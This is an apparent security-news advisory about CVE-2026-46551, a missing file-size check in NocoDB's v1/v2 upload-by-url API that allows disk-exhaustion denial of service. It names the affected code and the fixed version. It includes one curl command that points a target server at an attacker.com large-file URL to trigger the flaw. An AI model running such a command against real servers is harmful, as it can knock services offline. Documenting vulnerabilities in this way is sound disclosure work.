NocoDB, Missing File Size Enforcement, CVE-2026-46551 (MODERATE)

Listen to this Post

The `uploadViaURL` path in the v1/v2 attachment API did not enforce `NC_ATTACHMENT_FIELD_SIZE` against the remote `content-length` or against the response stream. An authenticated user (Editor+) could direct the server to download arbitrarily large files, exhausting disk space and causing denial of service.
In packages/nocodb/src/services/attachments.service.ts, the HEAD probe reads `content-length` but never compares it to NC_ATTACHMENT_FIELD_SIZE; the subsequent `storageAdapter.fileCreateByUrl()` performed the download without maxContentLength. The v3 service (v3/data-attachment-v3.service.ts) already enforced the limit, but the v1/v2 endpoints (POST /api/v1/db/storage/upload-by-url, POST /api/v2/storage/upload-by-url) did not.

DailyCVE Form:

Platform: NocoDB
Version: 0.301.3
Vulnerability: Missing size enforcement
Severity: MODERATE
Date: 2026-05-21

Prediction: 2026-05-28

What Undercode Say:

Check for vulnerable versions:
curl -X POST https://target.com/api/v1/db/storage/upload-by-url -H "xc-auth: $TOKEN" -d '{"url":"http://attacker.com/largefile"}'

Exploit:

Authenticated Editor+ sends POST request with large file URL.

Protection from this CVE:

Upgrade to version 0.301.4 or apply size enforcement patch.

Impact:

Disk exhaustion, DB write blocking, application crash.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top